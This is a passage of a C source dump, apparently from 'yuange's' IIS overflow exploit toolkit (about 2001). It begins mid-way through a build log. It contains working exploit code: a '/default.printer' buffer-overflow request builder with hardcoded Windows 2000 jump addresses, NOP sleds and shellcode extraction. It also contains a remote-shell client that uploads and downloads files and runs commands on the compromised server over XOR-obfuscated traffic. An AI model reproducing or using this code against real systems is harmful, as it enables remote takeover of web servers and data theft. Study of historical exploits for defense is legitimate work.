17 | kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:yes /pdb:"Debug/main.pdb" /debug /machine:I386 /out:"Debug/main.exe" /pdbtype:sept 
18 | .\Debug\main.obj
19 | ]
20 | Creating command line "link.exe @E:\DOCUME~1\yuange\LOCALS~1\Temp\RSP5C.tmp"
21 | <h3>Output Window</h3>
22 | Compiling...
23 | main.c
24 | c:\t2306\include\inout.c(30) : warning C4047: 'initializing' : 'int *' differs in levels of indirection from 'const char ** '
25 | c:\t2306\include\getvar.c(30) : warning C4018: '<' : signed/unsigned mismatch
26 | c:\t2306\include\sendrecv.c(32) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
27 | c:\t2306\include\sendrecv.c(33) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 1
28 | c:\t2306\include\over.c(8) : warning C4013: 'GetOverStr' undefined; assuming extern returning int
29 | c:\t2306\include\getshellcode.c(12) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
30 | c:\t2306\include\getshellcode.c(12) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
31 | c:\t2306\include\getshellcode.c(22) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
32 | c:\t2306\include\getshellcode.c(22) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
33 | c:\t2306\include\getshellcode.c(34) : warning C4013: '_chkesp' undefined; assuming extern returning int
34 | c:\t2306\include\getshellcode.c(35) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'int (__cdecl *)()'
35 | c:\t2306\include\getshellcode.c(35) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
36 | c:\t2306\include\getshellcode.c(10) : warning C4101: 'j' : unreferenced local variable
37 | c:\t2306\include\getshellcode.c(54) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)()'
38 | c:\t2306\include\getshellcode.c(54) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
39 | c:\t2306\include\getshellcode.c(64) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'void (__cdecl *)(char *)'
40 | c:\t2306\include\getshellcode.c(64) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
41 | c:\t2306\include\getshellcode.c(77) : warning C4047: 'function' : 'char *' differs in levels of indirection from 'int (__cdecl *)()'
42 | c:\t2306\include\getshellcode.c(77) : warning C4024: 'getfnaddress' : different types for formal and actual parameter 1
43 | c:\t2306\include\getshellcode.c(109) : warning C4305: '=' : truncation from 'const int ' to 'char '
44 | c:\t2306\include\shellcode.c(111) : warning C4047: '=' : 'char *' differs in levels of indirection from 'const unsigned int '
45 | c:\t2306\include\shellcode.c(130) : warning C4047: '==' : 'int ' differs in levels of indirection from 'int *'
46 | c:\t2306\include\shellcode.c(171) : warning C4102: 'execptprogram' : unreferenced label
47 | c:\t2306\include\shellcode.c(201) : warning C4047: 'initializing' : 'int (__stdcall *)()' differs in levels of indirection from 'char *'
48 | c:\t2306\include\shellcode.c(226) : warning C4047: '=' : 'int *' differs in levels of indirection from 'const unsigned int '
49 | c:\t2306\include\shellcode.c(227) : warning C4133: '=' : incompatible types - from 'char *' to 'int *'
50 | c:\t2306\include\shellcode.c(240) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
51 | c:\t2306\include\shellcode.c(248) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
52 | c:\t2306\include\shellcode.c(260) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
53 | c:\t2306\include\shellcode.c(263) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
54 | c:\t2306\include\shellcode.c(264) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
55 | c:\t2306\include\shellcode.c(271) : warning C4047: '=' : 'int ' differs in levels of indirection from 'char *'
56 | c:\t2306\include\shellcode.c(272) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
57 | c:\t2306\include\shellcode.c(337) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
58 | c:\t2306\include\shellcode.c(338) : warning C4047: '=' : 'int (__stdcall *)()' differs in levels of indirection from 'int '
59 | c:\t2306\include\shellcode.c(339) : warning C4047: '=' : 'void *' differs in levels of indirection from 'int '
60 | c:\t2306\include\shellcode.c(341) : warning C4047: '=' : 'char *' differs in levels of indirection from 'int '
61 | c:\t2306\include\shellcode.c(642) : warning C4102: 'execptprogram' : unreferenced label
62 | c:\t2306\include\shellcode.c(642) : warning C4102: 'asmreturn' : unreferenced label
63 | c:\t2306\include\shellcode.c(202) : warning C4101: 'dooradd' : unreferenced local variable
64 | c:\t2306\include\shellcode.c(181) : warning C4101: 'msvcrtdlladd' : unreferenced local variable
65 | c:\t2306\include\shellcode.c(180) : warning C4101: 'memcpyadd' : unreferenced local variable
66 | c:\t2306\aspcodeview\getoverstr.c(28) : warning C4101: 'i' : unreferenced local variable
67 | c:\t2306\aspcodeview\getoverstr.c(40) : warning C4101: 'shellcodebuff' : unreferenced local variable
68 | c:\t2306\aspcodeview\getoverstr.c(42) : warning C4101: 'postbytes' : unreferenced local variable
69 | Linking...
70 | 
71 | 
72 | 
73 | <h3>Results</h3>
74 | main.exe - 0 error(s), 45 warning(s)
75 | </pre>
76 | </body>
77 | </html>
78 | 


--------------------------------------------------------------------------------
/aspcodeview/overinfo.c:
--------------------------------------------------------------------------------
1 | 
2 | void  printinfo()
3 | { 
4 | strout("\r\nIIS OVERFLOW PROGRAM 2.0.\r\n");
5 | //strout("\r\nCopy by yuange 2001.05.03.\r\n");
6 | } 


--------------------------------------------------------------------------------
/aspcodeview/shellcode.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/aspcodeview/shellcode.c


--------------------------------------------------------------------------------
/include/cmd.c:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | void shellcmd(int fd)
  4 | {
  5 | 
  6 |   int   i,j,k,l;
  7 |   char  recvbuff[BUFFSIZE];
  8 |   char  buff[BUFFSIZE];
  9 | 
 10 |   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
 11 |   lockintvar2=lockintvar1;
 12 |   xordatabegin=0;
 13 | 
 14 |   
 15 | 
 16 | 
 17 |      k=0;
 18 |      ioctlsocket(fd, FIONBIO, &k);
 19 | 
 20 |      j=0;
 21 |     // while(j==0)
 22 | 	// {
 23 | 	     k=newrecv(fd,recvbuff,BUFFSIZE,0);
 24 |          if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
 25 | 		    xordatabegin=1;
 26 |             sprintf(buff,"\r\nok!recv %d bytes\r\n",k);
 27 | 			strout(buff);
 28 | 			recvbuff[k]=0;
 29 | 			sprintf(buff,"\r\nrecv:%s\r\n\r\n",recvbuff);
 30 |       	    strout(buff);
 31 |             k=-1;
 32 | 			j=1;
 33 | 		 }
 34 | 	     if(k>0){
 35 | 	 	    recvbuff[k]=0;
 36 | 		    strout("\r\nrecv:\r\n");
 37 |             strout(recvbuff); 
 38 | 			strout("\r\n");
 39 | 		 }
 40 | 		 else
 41 | 		 {
 42 |              i=WSAGetLastError();
 43 | 		     if(k==0||i==0x2746||i==0x2745)
 44 | 			 {
 45 |                 strout("\r\nserver close!\r\n");
 46 | 			    exit(1);  
 47 | 			 }
 48 |          }
 49 | 	// }
 50 | 
 51 |   
 52 | 
 53 |      k=1;
 54 |      ioctlsocket(fd, FIONBIO, &k);
 55 | 
 56 |  
 57 |   k=1;
 58 |   l=0;
 59 |   while(k!=0)
 60 |   {
 61 | 	  if(k<0)
 62 | 	  {
 63 | 
 64 | 		  l=0;
 65 |           i=0;
 66 | 	//	  while(i==0){
 67 | 			  buff[0]=0;
 68 |               j=strin(buff,sizeof(buff));
 69 | 
 70 | 			  if(memcmp(buff,"iisexit",7)==0)
 71 | 			  {
 72 | 				     strout("\r\nClose server!\r\n");
 73 | 					 Sleep(1000);
 74 | 		  	         exit(0);
 75 | 			  }
 76 | 			  if(memcmp(buff,"iisput",6)==0){
 77 | 		  	         iisput(fd,buff+6);
 78 | 					 i=2;
 79 | 			  }
 80 |               if(memcmp(buff,"iisget",6)==0){
 81 | 		  	         iisget(fd,buff+6);
 82 | 					 i=2;
 83 | 			  }
 84 |               if(memcmp(buff,"iiscmd",6)==0){
 85 |     	             iiscmd(fd,buff+6);
 86 | 					 i=2;
 87 |               }
 88 | /*            if(memcmp(buff,"iish",4)==0){
 89 | 		  	         iishelp();
 90 | 					 i=2;
 91 | 			  }
 92 |               if(memcmp(buff,"iisreset",8)==0){
 93 |     	             iisreset(fd,buff+6);
 94 | 					 i=2;
 95 |               }
 96 |               if(memcmp(buff,"iisdie",6)==0){
 97 |     	             iisdie(fd,buff+6);
 98 | 					 i=2;
 99 |               }
100 | 
101 | */
102 | 		//	  if(i==2)i=0;
103 | 		//	  else i=1;
104 | 
105 |   //        }
106 | 	
107 | 
108 | 		  k=strlen(buff);
109 | 		  if(i!=2&&j>=0)
110 | 		  {	  
111 |              memcpy(buff+k,SRLF,3);
112 | 	         newsend(fd,buff,k+2,0);
113 | 		  }
114 | 
115 |       }
116 | 	  k=newrecv(fd,buff,BUFFSIZE,0);
117 | /*      if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
118 | 		  xordatabegin=1;
119 |           k=-1;
120 | 	  }
121 | */
122 | 	  if(k>0)
123 | 	  {
124 |           l=0;
125 | 		  buff[k]=0;
126 | 		  strout(buff);
127 | 
128 |       }
129 |       else
130 | 	  {
131 | 		  Sleep(20);
132 | 		  if(l<20) k=1;
133 |           ++l;  
134 |       }
135 | 
136 | 
137 |   }
138 | }
139 | 
140 | 
141 | void iisput(int fd,char *str){
142 |  
143 |  char *filename;
144 |  char *filename2;
145 |  FILE *fpt;
146 |  char buff[0x2000];
147 |  int size=0x2000,i,j,filesize,filesizehigh;
148 | 
149 |  filename="\0";
150 |  filename2="\0";
151 |  j=strlen(str);
152 |  for(i=0;i<j;++i,++str){
153 | 	 if(*str!=' '){
154 | 		 filename=str;
155 |          break;
156 |      } 
157 |  }
158 |  for(;i<j;++i,++str){
159 | 	 if(*str==' ') {
160 | 		 *str=0;
161 | 		 break;
162 |      }
163 |  }
164 |  ++i;
165 |  ++str;
166 |  for(;i<j;++i,++str){
167 | 	 if(*str!=' '){
168 | 	   filename2=str;
169 |        break;
170 |      }
171 |  }
172 |  for(;i<j;++i,++str){
173 | 	 if(*str==' ') {
174 | 		 *str=0;
175 | 		 break;
176 |      }
177 |  }
178 | 
179 | 
180 |  if(filename=="\x0") {
181 |      strout("\r\n iisput filename [path\\fiename]\r\n");	 
182 | 	 return;
183 |  }
184 |  if(filename2=="\x0") filename2=filename;
185 |  
186 |  outprintf("\r\n begin put file:%s",filename);
187 | 
188 |  j=0;
189 |  ioctlsocket(fd, FIONBIO, &j);
190 | 
191 | 
192 |  Sleep(1000);
193 |  
194 |  fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); 
195 | 
196 |  filesize=GetFileSize(fpt,&filesizehigh);
197 |  strcpy(buff,"put ");
198 |  *(int *)(buff+4)=filesize;
199 |  filesize=*(int *)(buff+4);
200 |  strcpy(buff+0x8,filename2);
201 |  newsend(fd,buff,i+0x9,0);
202 |  outprintf("\r\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
203 |  Sleep(1000);
204 | 
205 |  while(filesize>0){
206 | 	  size=0x800;
207 |       ReadFile(fpt,buff,size,&size,NULL); 
208 |       if(size>0){
209 |           filesize-=size;
210 | 		  newsend(fd,buff,size,0);
211 | //	      Sleep(0100);
212 | 	     
213 |       }
214 |  }
215 | 
216 | // size=filesize;
217 | // ReadFile(fpt,buff,size,&size,NULL); 
218 | // if(size>0) send(fd,buff,size,0);
219 | 
220 |  CloseHandle(fpt);
221 |  j=1;
222 |  ioctlsocket(fd, FIONBIO, &j);
223 |  
224 |  outprintf("\r\n put file ok!\r\n");
225 |  Sleep(1000);
226 |  
227 | 
228 | }
229 | 
230 | 
231 | 
232 | void iisget(int fd,char *str){
233 |  
234 |  char *filename;
235 |  char *filename2;
236 |  FILE *fpt;
237 |  char buff[0x2000];
238 |  int size=0x2000,i,j,filesize;  //,filesizehigh;
239 | 
240 |  filename="\0";
241 |  filename2="\0";
242 |  j=strlen(str);
243 |  for(i=0;i<j;++i,++str){
244 | 	 if(*str!=' '){
245 | 		 filename=str;
246 |          break;
247 |      } 
248 |  }
249 |  for(;i<j;++i,++str){
250 | 	 if(*str==' ') {
251 | 		 *str=0;
252 | 		 break;
253 |      }
254 |  }
255 |  ++i;
256 |  ++str;
257 |  for(;i<j;++i,++str){
258 | 	 if(*str!=' '){
259 | 	   filename2=str;
260 |        break;
261 |      }
262 |  }
263 |  for(;i<j;++i,++str){
264 | 	 if(*str==' ') {
265 | 		 *str=0;
266 | 		 break;
267 |      }
268 |  }
269 | 
270 | 
271 |  if(filename=="\x0") {
272 |      outprintf("\r\n iisget filename [path\\fiename]\r\n");	 
273 | 	 return;
274 |  }
275 |  if(filename2=="\x0") filename2=filename;
276 |  
277 |  outprintf("\r\n begin get file:%s",filename);
278 |  
279 |  fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); 
280 | 
281 |  strcpy(buff,"get ");
282 |  strcpy(buff+0x4,filename2);
283 |  newsend(fd,buff,i+0x5,0);
284 |  outprintf("\r\n get file:%s from file:%s",filename,filename2);
285 |  
286 |   j=0;
287 |   ioctlsocket(fd, FIONBIO, &j);
288 | 
289 |  i=0;
290 |  filesize=0;
291 | 
292 | 
293 | 
294 |  j=0;
295 |  while(j<100){
296 |  
297 | //    Sleep(100);
298 |     i=newrecv(fd,buff,0x800,0);
299 |     if(i>0){
300 | 		buff[i]=0;
301 | 		if(memcmp(buff,"size",4)==0){
302 | 			filesize=*(int *)(buff+4);
303 |             j=100;
304 |         }
305 | 		else {
306 | 			
307 | /*			  for(j=0;j<i;++j){
308 |                 lockintvar1=lockintvar1*0x100;
309 | 				lockintvar1=lockintvar1%LOCKBIGNUM;
310 | 				lockcharvar=lockintvar1%0x100;
311 |                 buff[j]^=lockcharvar;   // DATAXORCODE;
312 | 			  }
313 | */
314 | 			  j=0;
315 |  			  outprintf("\r\n recv %s",buff);
316 | 		}
317 | 	}
318 | 	else ++j;
319 | //	if(j>1000) i=0;
320 |  }
321 |  outprintf("\r\n file %d bytes %d\r\n",filesize,i);
322 |  if(i>8){
323 | 	  i-=8;
324 |       filesize-=i;
325 |       WriteFile(fpt,buff+8,i,&i,NULL);
326 |      
327 |  }
328 |  
329 |  while(filesize>0){
330 | 	      size=newrecv(fd,buff,0x800,0);
331 |           if(size>0){
332 |              filesize-=size;
333 |              WriteFile(fpt,buff,size,&size,NULL); 
334 |           
335 | 		  }
336 | 		  else {
337 | 			  if(size==0) {
338 |                outprintf("\r\n ftp close \r\n "); 
339 | 
340 | 			  }
341 | 			  else {
342 | 				  outprintf("\r\n Sleep(100)");
343 | 				  Sleep(100);
344 |               }
345 |           }
346 |  
347 |  }
348 |  CloseHandle(fpt);
349 |  outprintf("\r\n get file ok!\r\n");
350 | 
351 |  j=1;
352 |  ioctlsocket(fd, FIONBIO, &j);
353 | 
354 | 
355 | }
356 | 
357 | 
358 | void iisreset(int fd,char *str){
359 | 
360 |     char buff[0x2000];
361 | 	int  i,j;
362 |     outprintf("\nreset xor data.\n");
363 |     Sleep(1000);
364 |     j=0;
365 |     ioctlsocket(fd, FIONBIO, &j);
366 |     strcpy(buff,"reset");
367 |     newsend(fd,buff,strlen(buff),0);
368 | 	Sleep(1000);
369 | 
370 |    
371 | 
372 |     lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
373 |     lockintvar2=lockintvar1;
374 | 
375 | 
376 | 	while(1){
377 | 	  j=recv(fd,buff,0x2000,0);
378 | 	  if(j>0){
379 | 		  buff[j]=0;
380 | 		  for(i=0;i<j;++i){
381 | 			  if(buff[i]==0) buff[i]='b';
382 |           }
383 | 	//	  outprintf("\r\nrecv 0x%x bytes:%s",j,buff);
384 | 		  if(strstr(buff,"xordatareset")!=0){
385 | 			 outprintf("\r\nxor data reset ok.\r\n");
386 | 
387 |              for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
388 |                 lockintvar1=lockintvar1*0x100;
389 | 				lockintvar1=lockintvar1%LOCKBIGNUM;
390 | 				lockcharvar=lockintvar1%0x100;
391 |                 buff[i]^=lockcharvar;   // DATAXORCODE;
392 | 			  }
393 | 			
394 | 
395 | 			  break;
396 |           }
397 |       }
398 | //	  else if(j==0) break;
399 | //	  strcpy(buff,"\r\nmkdir d:\\test6\r\n");
400 | //      newsend(fd,buff,strlen(buff),0);
401 | 	}
402 | 	Sleep(1000);
403 |     j=1;
404 |     ioctlsocket(fd, FIONBIO, &j);
405 | //    outprintf("aaa");
406 | }
407 | 
408 | 
409 | 
410 | void iisdie(int fd,char *str){
411 | 
412 |     char buff[0x200];
413 | 	int  j;
414 |     outprintf("\r\niis die.\r\n");
415 |     j=0;
416 |     ioctlsocket(fd, FIONBIO, &j);
417 |     Sleep(1000);
418 |     strcpy(buff,"iisrr ");
419 |     newsend(fd,buff,strlen(buff),0);
420 | 	Sleep(1000);
421 |     j=1;
422 |     ioctlsocket(fd, FIONBIO, &j);
423 |     lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
424 |     lockintvar2=lockintvar1;
425 | }
426 | 
427 | 
428 | 
429 | void iiscmd(int fd,char *str){
430 | 
431 | 	char *cmd="\0";
432 | 	char buff[2000];
433 |     int  i,j;
434 | 
435 |     j=strlen(str);
436 |     for(i=0;i<j;++i,++str){
437 | 	  if(*str!=' '){
438 | 	 	 cmd=str;
439 |          break;
440 | 	  } 
441 | 	}
442 | 	j=strlen(str);
443 |     for(i=0;i<j;++i){
444 | 	   if(*(str+j-i-1)!=' ') {
445 | 	  	 break;
446 | 	   }
447 | 	   else *(str+j-i-1)=0;
448 | 	}
449 |   
450 | 	if(cmd=="\x0") {
451 |         outprintf("\r\niiscmd cmd\r\n");	 
452 | 	    return;
453 | 	}
454 |  
455 |     outprintf("\r\nbegin run cmd:%s\r\n",cmd);
456 |     j=0;
457 |     ioctlsocket(fd, FIONBIO, &j);
458 |     Sleep(1000);
459 |     strcpy(buff,"iisc ");
460 | 	strcat(buff,cmd);
461 |     newsend(fd,buff,strlen(buff),0);
462 | 	Sleep(1000);
463 |     j=1;
464 |     ioctlsocket(fd, FIONBIO, &j);
465 | 
466 | /*
467 |     lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
468 |     lockintvar2=lockintvar1;
469 | */
470 | 
471 | }
472 | 
473 | 
474 | 
475 | 
476 | 


--------------------------------------------------------------------------------
/include/getoverstr.c:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | //#include "getshellcode.c"
 4 | 
 5 | 
 6 | 
 7 | 
 8 | int  getoverbuff(char *overbuff)
 9 | {
10 | 
11 |  //*********************************************************************************************
12 |   char  eipjmpespwin2000tw[]="\xb6\x37\xfc\x7f"; //"\xc1\x63\xfa\x7f"; //"\x33\x75\x18\x00";//
13 |   char  eipretwin2000tw[]="\xb7\x37\xfc\x7f"; 
14 |   char  eipjmpebxwin2000tw[]="\xbc\x36\xfc\x7f"; //"\xc1\x63\xfa\x7f"; //"\x33\x75\x18\x00";//
15 |   char  eipjmpeaxwin2000tw[]="\x2e\x36\xfc\x7f"; //"\xc1\x63\xfa\x7f"; //"\x33\x75\x18\x00";//
16 |   
17 |   char  *eipretwin2000add=eipretwin2000tw;
18 |   char  *eipjmpespwin2000add=eipjmpespwin2000tw;
19 |   char  *eipjmpebxwin2000add=eipjmpebxwin2000tw;
20 |   char  *eipjmpeaxwin2000add=eipjmpeaxwin2000tw;
21 | 
22 |   //*********************************************************************************************
23 | 
24 |   
25 |   #define  RETEIPADDRESS 0x100
26 |   char  jmpshell[]="BBBB\xff\x63\x78";
27 |   char  buff[BUFFSIZE];
28 |   int   i;
29 | 
30 |   memset(buff,NOPCODE,BUFFSIZE);
31 | 
32 |   for(i=-0x40;i<=0x40;i+=4)
33 |   {
34 |             memcpy(buff+RETEIPADDRESS+i,eipretwin2000add,4);
35 |   }     
36 |   memcpy(buff+RETEIPADDRESS+i,eipjmpespwin2000add,4);
37 |   memcpy(buff+RETEIPADDRESS+i+0x04,jmpshell,strlen(jmpshell));
38 |   i+=0x10;
39 |   buff[RETEIPADDRESS+i]=0;
40 |   strcpy(overbuff,buff);
41 |   return strlen(buff);
42 | }
43 | 
44 | 
45 | 
46 | int  GetOverStr(char *buffer,char *server,char *urlfile,int offset)
47 | {
48 | 
49 |   char    shellcodebuff[BUFFSIZE];
50 |   char    overbuff[BUFFSIZE];
51 |   int     postbytes;
52 |   char    *url="/iisstart.asp";
53 | 
54 |   char    overstr[]="GET /default.printer HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\nContent-Length:%d\r\n\r\n%s";
55 |  
56 |   if(urlfile!=NULL) url=urlfile;
57 |   getoverbuff(overbuff);
58 |   postbytes=GetShellcode(shellcodebuff);
59 |   _snprintf(buffer,BUFFSIZE,overstr,overbuff,postbytes,shellcodebuff);
60 |   return (strlen(buffer));
61 | }


--------------------------------------------------------------------------------
/include/getshellcode.c:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | 
  4 | int  GetFindShellcode(char *buffer)
  5 | {
  6 | 
  7 |   char    *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  8 |   char    *shellcodefnadd,*chkespadd;
  9 |   char    shellcodebuff[BUFFSIZE];
 10 |   int     i,j,k;
 11 |  
 12 |   shellcodefnadd=getfnaddress(shellcodefnlock);
 13 |   
 14 |   for(k=0;k<=BUFFSIZE;++k){
 15 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 16 |   }
 17 |   for(i=0;i<=BUFFSIZE;++i){
 18 | 		 if(memcmp(shellcodefnadd+k+FNENDLONG+i,fnendstr,FNENDLONG)==0) break;
 19 |   }
 20 |   memcpy(buffer,shellcodefnadd+k+FNENDLONG,i);
 21 | 
 22 |   shellcodefnadd=getfnaddress(findshellcodefn);
 23 | 
 24 |   for(k=0;k<=BUFFSIZE;++k){
 25 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 26 |   }
 27 | 
 28 |   memcpy(shellcodebuff,shellcodefnadd,k); 
 29 | 
 30 |   _asm{
 31 | 		 mov ESI,ESP
 32 | 		 cmp ESI,ESP
 33 |   }
 34 |   _chkesp();
 35 |   chkespadd=getfnaddress(_chkesp);
 36 |   
 37 |   cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 38 |   k=codeshell(buffer+i,BUFFSIZE-i,shellcodebuff,k);
 39 |   i=i+k;
 40 | 
 41 |   return i;
 42 | }
 43 | 
 44 | 
 45 | 
 46 | int  GetShellcode(char *buffer)
 47 | {
 48 | 
 49 |   char    *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 50 |   char    *shellcodefnadd,*chkespadd;
 51 |   char    shellcodebuff[BUFFSIZE];
 52 |   int     i,j,k;
 53 |  
 54 |   shellcodefnadd=getfnaddress(shellcodefnlock);
 55 |   
 56 |   for(k=0;k<=BUFFSIZE;++k){
 57 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 58 |   }
 59 |   for(i=0;i<=BUFFSIZE;++i){
 60 | 		 if(memcmp(shellcodefnadd+k+FNENDLONG+i,fnendstr,FNENDLONG)==0) break;
 61 |   }
 62 |   memcpy(buffer,shellcodefnadd+k+FNENDLONG,i);
 63 | 
 64 |   shellcodefnadd=getfnaddress(shellcodefn);
 65 | 
 66 |   for(k=0;k<=BUFFSIZE;++k){
 67 | 		 if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 68 |   }
 69 | 
 70 |   memcpy(shellcodebuff,shellcodefnadd,k); 
 71 | 
 72 |   _asm{
 73 | 		 mov ESI,ESP
 74 | 		 cmp ESI,ESP
 75 |   }
 76 |   _chkesp();
 77 |   chkespadd=getfnaddress(_chkesp);
 78 |   
 79 |   cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 80 |   j=getapistr(shellcodebuff+k);
 81 |   k=k+j;
 82 |   k=codeshell(buffer+i,BUFFSIZE-i,shellcodebuff,k);
 83 |   i=i+k;
 84 | 
 85 |   return i;
 86 | }
 87 | 
 88 | 
 89 | 
 90 | 
 91 | void cleanchkesp(char *fnadd,char *shellbuff,char *chkesp,int len)
 92 | { 
 93 |    int i,k;
 94 |    unsigned char temp;
 95 |    char *calladd;
 96 | 
 97 |    for(i=0;i<len;++i)
 98 |    {
 99 | 	   temp=shellbuff[i];
100 |        if(temp==0xe8)
101 | 	   {
102 |          k=*(int *)(shellbuff+i+1);
103 | 		 calladd=fnadd;
104 | 		 calladd+=k;
105 | 		 calladd+=i;
106 | 		 calladd+=5;
107 | 		 if(calladd==chkesp)
108 | 		 {
109 | 			 shellbuff[i]=0x90;
110 | 			 shellbuff[i+1]=0x43;   // inc ebx
111 | 		     shellbuff[i+2]=0x4b;	// dec ebx
112 | 			 shellbuff[i+3]=0x43;
113 | 			 shellbuff[i+4]=0x4b;
114 | 		 }
115 | 	   }
116 |    }
117 | }
118 | 
119 | 
120 | char *getfnaddress(char *fn)
121 | {
122 | 	unsigned char temp;
123 |     temp=*fn;
124 |     if(temp==0xe9)
125 | 	{
126 | 		 fn+=*(int*)(fn+1);
127 | 		 fn+=5;
128 | 	}
129 | 	return(fn);
130 | }
131 |  	
132 | 


--------------------------------------------------------------------------------
/include/getvar.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/include/getvar.c


--------------------------------------------------------------------------------
/include/inout.c:
--------------------------------------------------------------------------------
 1 | 
 2 | void  strout(char *buff)  //,int len)
 3 | {
 4 | 
 5 | 	int i,j;
 6 | 	char buff2[BUFFSIZE];
 7 | 	if(callback_socket==0)
 8 | 	{
 9 | //      buff[len]=0;
10 |         printf("%s",buff);
11 | 	}
12 | 	else
13 | 	{
14 | 		i=strlen(buff);
15 | 		if(i>0)
16 | 		{
17 |              for(j=0;j<i;++j) buff2[j]=buff[j]^0x99;
18 | 		}
19 | 		send(callback_socket,buff2,i,0);  //len,0);
20 | 	}
21 | 
22 | }
23 | 
24 |  
25 | 
26 | void  outprintf(const char *format,...)
27 | {
28 | 	  char     outbuff[BUFFSIZE] ;
29 | 
30 | 	  int     *var=&format;     
31 | 
32 |       sprintf(outbuff,format,*(var+1),*(var+2),*(var+3),*(var+4),*(var+5),*(var+6));
33 |       strout(outbuff);
34 | }
35 | 
36 | /*
37 | void  outfprintf(int f,const char *format,...)
38 | {
39 | 	  char     outbuff[BUFFSIZE] ;
40 | 
41 | 	  int     *var=&format;     
42 | 
43 |       sprintf(outbuff,format,*(var+1),*(var+2),*(var+3),*(var+4),*(var+5),*(var+6));
44 |       strout(outbuff);
45 | }
46 | 
47 | 
48 | */
49 | int  strin(char *buff,int len)
50 | {
51 | 
52 |     int i,j;
53 | 
54 | 	if(callback_socket==0)
55 | 	{
56 |        gets(buff);
57 | // 	   strcat(buff,"\r\n");
58 | 	   i=strlen(buff);
59 | 	}
60 | 	else
61 | 	{
62 | 		i=recv(callback_socket,buff,len,0);
63 | 		if(i>0)
64 | 		{
65 | 			 buff[i]=0;
66 |              for(j=0;j<i;++j) buff[j]^=0x99;
67 |              for(j=0;j<i;++j){
68 | 				 if(buff[j]=='\r'||buff[j]=='\n') buff[j]=0x0;
69 | 			 }
70 | 		}
71 | 		else
72 | 		{
73 | 
74 | 		     j=WSAGetLastError();
75 | 		     if(i==0||j==0x2746||j==0x2745)
76 | 			 {
77 | 		         printf("\r\nCall_back server close! \r\n");
78 | 			     exit(1);
79 | 			 }	 
80 | 		}
81 | 
82 | 	}
83 |     return i;
84 | }
85 | 


--------------------------------------------------------------------------------
/include/jmpadd.h:
--------------------------------------------------------------------------------
1 | 
2 | 
3 |  #define  eipjmpespwin2000 "\xb6\x37\xfc\x7f"
4 |  #define  eipretwin2000    "\xb7\x37\xfc\x7f"
5 | 
6 |  #define  eipjmpeaxwin2000 "\x2e\x36\xfc\x7f"
7 |  #define  eipjmpebxwin2000 "\xbc\x36\xfc\x7f"
8 |  #define  eipjmpediwin2000  "\xb3\x5e\xfa\x7f"
9 | 


--------------------------------------------------------------------------------
/include/over.c:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | void over(int fd)
 4 | {
 5 |   int   strlen;
 6 |   char  buff[BUFFSIZE];
 7 | 
 8 |   strlen=GetOverStr(buff,server,urlfile,offset);
 9 |   send(fd,buff,strlen,0);
10 | }


--------------------------------------------------------------------------------
/include/overinfo.c:
--------------------------------------------------------------------------------
 1 | 
 2 | void  printinfo()
 3 | { 
 4 | 
 5 | 	char buff[BUFFSIZE];
 6 | 
 7 | 	if(callback_socket!=0)
 8 | 	{
 9 | 		_snprintf(buff,BUFFSIZE,"exp_name=\"%s\",exp_ip=%s,exp_port=%s\r\n",exp_name,server,s_port);
10 | 	}	
11 |     else
12 | 	{
13 | 		_snprintf(buff,BUFFSIZE,"exp_name=\"%s\",exp_ip=%s,exp_port=%s\r\n",exp_name,server,s_port);
14 | 
15 | 	}
